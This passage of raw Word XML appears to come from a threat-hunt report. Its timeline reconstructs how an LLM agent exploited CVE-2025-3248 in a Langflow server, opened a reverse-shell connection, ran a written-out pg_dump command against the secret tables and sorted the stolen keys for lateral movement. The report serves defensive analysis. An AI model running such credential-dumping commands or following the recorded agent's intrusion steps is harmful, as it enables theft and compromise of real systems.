          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for me on this hunt. It wasn't the attack itself once I was finally looking at the right tables, on the right hosts, in the right time window, everything lined up cleanly and consistently. The process events, the network events, the file events, and the agent's own log all told the same story without me </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">having to force any of it together. Almost </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> my time was spent just getting oriented, not untangling the evidence, and I think that's worth knowing for next time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76201278" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kill Chain Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47718E90" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All times UTC, reconstructed from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinuxProcess_CL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LinuxNetwork_CL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Syslog, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinuxAudit_CL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LinuxFile_CL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LinuxSystem_CL</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LLMAgentLogs_CL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Duplicate ingestion rows (a recurring artifact in this dataset, seen 2–3× per event) were de-duplicated by timestamp and message content before reconstructing the sequence below.</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00"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E05751" w14:paraId="44F0E04F"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6A7705A6" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73209B40" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="245D1522" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67DA0C7D" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:20:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="331E16CA" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Inbound POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/v1/validate/code lands on ff-lf-01 (Langflow, port 7860) from 64.20.53.230 — python-requests/2.32.3 client, HTTP 200 on first attempt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="289C7FD1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22007359" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:20:01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0655E771" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Agent log records exploitation: CVE-2025-3248 (Python default-argument evaluation flaw in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Langflow's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> code-validation endpoint) abused for unauthenticated RCE. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>tool_result</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>rce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> established, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>langflow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="0E852222" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16E03D62" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:20:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="339FA4E1" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>First interpreter spawned — python3.11 (PID 4471), command line python3 -c &lt;base64 payload&gt;, parented directly by the Langflow service process (/opt/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>langflow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>venv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>langflow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> run --host 0.0.0.0 --port 7860). This is the alert-triggering process: a web service spawning an ad-hoc interpreter is not normal Langflow </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>behaviour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="75682E29" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="247B3663" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:20:05 – 19:20:08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25E24B1C" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial recon inside the RCE shell: id, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -a — both parented by the same python3 -c process, confirming the shell was interactive and functional, not a crash.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="1D884C77" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38BFD58E" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:22:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32706966" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Outbound connection from ff-lf-01 to 45.131.66.106:4444 (PID 4471) — a single, unique destination against a baseline of ~800 recurring CDN/monitoring connections that day. Port 4444 is the default Metasploit/reverse-shell listener port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="28EFA771" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10EA45FA" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:25:07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="068B4C02" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential dump: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>pg_dump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -h 127.0.0.1 -U </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>langflow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -d </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>langflow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -t variable -t </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>api_key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>, parented by the RCE shell — a surgical pull of exactly the two tables Langflow uses to store secrets, not a full-database backup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="7276E707" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CF7752B" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:25:13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C56A14E" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Agent classifies the stolen secrets in a single pass (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>tool_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>: classify secrets). Result spans 8 distinct provider families across 3 categories: LLM keys (OpenAI, Anthropic, DeepSeek, Gemini), cloud credentials (Alibaba/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Aliyun</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>, Tencent, Huawei), plus database logins and crypto wallets. Agent's own words: '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Prioritising</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> cloud and database creds for lateral movement.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="0F53005E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
